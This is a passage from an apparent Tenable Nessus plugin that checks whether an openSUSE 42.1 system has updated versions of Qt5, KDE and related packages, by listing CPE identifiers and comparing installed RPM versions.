script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qt3d-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qt3d-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qt3d-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qt3d-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qt3d-imports\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qt3d-imports-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qt3d-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-common-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-common-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-doc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-examples-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-examples-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-platformtheme-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-platformtheme-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtbase-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtconnectivity-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtct\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtct-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtct-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-devel-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdeclarative-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtgraphicaleffects\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtimageformats\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtimageformats-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtimageformats-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtimageformats-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtimageformats-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtimageformats-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtlocation-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtlocation-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtlocation-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtlocation-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtlocation-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtlocation-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtmultimedia-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquick1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquick1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquick1-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquick1-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquick1-devel-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquick1-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquick1-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquick1-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtquickcontrols-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtscript-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtscript-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtscript-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtscript-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtscript-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtscript-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsensors-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsensors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsensors-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsensors-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsensors-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsensors-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtserialport-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtserialport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtserialport-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtserialport-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsvg-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsvg-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsvg-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsvg-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsvg-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtsvg-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttools-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qttranslations\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwayland-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebchannel-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebengine-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebkit-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebkit-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebkit-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebkit-examples-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtwebsockets-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtx11extras-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtx11extras-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtx11extras-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-examples\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-examples-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libqt5-qtxmlpatterns-private-headers-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lxqt-powermanagement\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lxqt-powermanagement-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lxqt-powermanagement-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lxqt-powermanagement-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lxqt-qtplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lxqt-qtplugin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:lxqt-qtplugin-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"calibre-2.46.0-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"calibre-debuginfo-2.46.0-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"calibre-debugsource-2.46.0-11.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"fcitx-qt5-1.0.4-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"fcitx-qt5-debuginfo-1.0.4-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"fcitx-qt5-debugsource-1.0.4-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"fcitx-qt5-devel-1.0.4-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"frameworkintegration-debugsource-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"frameworkintegration-devel-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"frameworkintegration-plugin-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"frameworkintegration-plugin-debuginfo-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwayland-5.4.3-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwayland-debuginfo-5.4.3-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwayland-debugsource-5.4.3-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwayland-devel-5.4.3-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwin5-5.4.3-6.10\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwin5-debuginfo-5.4.3-6.10\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwin5-debugsource-5.4.3-6.10\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwin5-devel-5.4.3-6.10\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"kwin5-lang-5.4.3-6.10\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libKF5Style5-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libKF5Style5-debuginfo-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libKF5Style5-lang-5.16.0-6.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DCollision-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DCollision5-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DCollision5-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DCore-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DCore5-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DCore5-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DInput-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DInput5-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DInput5-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DLogic-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DLogic5-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DLogic5-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DQuick-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DQuick5-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DQuick5-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DQuickRenderer-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DQuickRenderer5-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DQuickRenderer5-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DRenderer-devel-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DRenderer5-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt53DRenderer5-debuginfo-5.5.1-2.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Bluetooth5-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Bluetooth5-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Bluetooth5-imports-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Bluetooth5-imports-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Bootstrap-devel-static-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5CLucene5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5CLucene5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Compositor5-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Compositor5-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Concurrent-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Concurrent5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Concurrent5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Core-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Core-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Core5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Core5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5DBus-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5DBus-devel-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5DBus-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5DBus5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5DBus5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Declarative5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Declarative5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Designer5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Designer5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5DesignerComponents5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5DesignerComponents5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Gui-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Gui-private-headers-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Gui5-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Gui5-debuginfo-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Help5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Help5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Location5-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Location5-debuginfo-5.5.1-3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Multimedia5-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Multimedia5-debuginfo-5.5.1-3.3\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libQt5Network-devel-5.5.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", 